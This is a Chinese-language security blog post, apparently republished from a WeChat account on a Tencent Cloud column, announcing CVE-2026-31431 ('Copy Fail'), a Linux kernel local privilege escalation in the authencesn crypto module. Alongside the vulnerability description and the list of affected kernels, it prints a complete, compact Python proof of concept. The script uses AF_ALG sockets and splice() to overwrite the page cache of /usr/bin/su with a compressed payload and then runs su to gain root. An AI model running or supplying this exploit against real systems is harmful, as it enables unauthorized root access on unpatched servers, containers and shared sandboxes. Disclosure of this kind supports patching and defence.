首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >CVE-2026-31431|影响范围很广!Linux内核Copy Fail本地提权漏洞(POC)

CVE-2026-31431|影响范围很广!Linux内核Copy Fail本地提权漏洞(POC)

作者头像
信安百科
发布2026-05-08 16:52:33
发布2026-05-08 16:52:33
2580
举报
文章被收录于专栏:信安百科信安百科

0x00 前言

Linux系统是一种开源的类Unix操作系统内核,由于其强大的可定制性和稳定性,Linux已被广泛应用于服务器、移动设备、物联网设备等多个领域。

Linux系统在发展过程中吸引了全球范围内的开发者,形成了一个强大的社区。它采用了GNU通用公共许可证(GPL),这意味着它是自由开源的,并鼓励用户共享和修改代码。这也导致了许多不同的Linux发行版,如Ubuntu、Fedora、Debian等。

一些知名的Linux发行版本包括:

代码语言:javascript
复制
Ubuntu:由Canonical公司维护,以易用性和用户友好性而闻名。
Debian:以稳定性和自由软件的支持而著称,许多其他发行版基于Debian构建。
RHEL (Red Hat Enterprise Linux):面向企业市场,提供长期支持和专业的技术支持。
CentOS:由Red Hat公司提供支持,注重稳定性和企业应用。
Fedora:由Red Hat公司支持,注重创新和最新的软件。
Arch Linux:以简洁和灵活而著称,面向高级用户。
openSUSE:由openSUSE项目维护,有两个主要版本:Leap(稳定版)和Tumbleweed(滚动更新)。
Gentoo:以源代码为基础,允许用户根据自己的硬件和需求定制系统。
Slackware:是最古老的现代Linux发行版之一,注重简洁和纯净。
Manjaro:基于Arch Linux,提供易用性和用户友好的桌面环境。
Linux Mint:基于Ubuntu和Debian,注重用户友好性和多媒体支持。
Elementary OS:以漂亮的用户界面和直观的设计而著称。
Kali Linux:专注于网络安全和渗透测试,包含许多安全工具。
Alpine Linux:专注于轻量级和安全性,常用于容器化环境。

0x01 漏洞描述

漏洞源于Linux内核加密子系统中authencesn模块的一个逻辑缺陷。攻击者通过结合使用AF_ALG套接字和splice()系统调用,能够向系统内任意可读文件(如/usr/bin/su)的内存页缓存(Page Cache)中写入4字节数据‌。这使得攻击者可以篡改高权限可执行文件在内存中的缓存,从而在执行该文件时获得root权限。‌‌

0x02 CVE编号

CVE-2026-31431

0x03 影响版本

代码语言:javascript
复制
主线内核:4.14至6.18.21;
长期支持版(LTS):6.12 全系列、6.6全系列、6.1全系列、5.15全系列、5.10全系列等;
发行版内核:RHEL/CentOS 4.18/5.14、Ubuntu 24.04 LTS及以下、Amazon Linux 2023及以下、SUSE 16及以下等自2017年以来构建且未打补丁的内核;
Kubernetes/容器平台;
云端Notebook/代码沙箱;
PaaS/Serverless执行环境;
堡垒机/跳板机/开发机;

0x04 漏洞详情

POC:

https://github.com/theori-io/copy-fail-CVE-2026-31431

代码语言:javascript
复制
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
 a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
 try:u.recv(8+t)
 except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")

0x05 参考链接

https://github.com/theori-io/copy-fail-CVE-2026-31431

https://www.openwall.com/lists/oss-security/2026/04/29/23

推荐阅读:

CVE-2025-32463|Linux sudo 本地提权漏洞(POC)

CVE-2024-1086|Linux内核权限提升漏洞(POC)

CVE-2025-21756|Linux提权漏洞(PoC)

Ps:国内外安全热点分享,欢迎大家分享、转载,请保证文章的完整性。文章中出现敏感信息和侵权内容,请联系作者删除信息。信息安全任重道远,感谢您的支持

!!!

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2026-05-02,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 信安百科 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档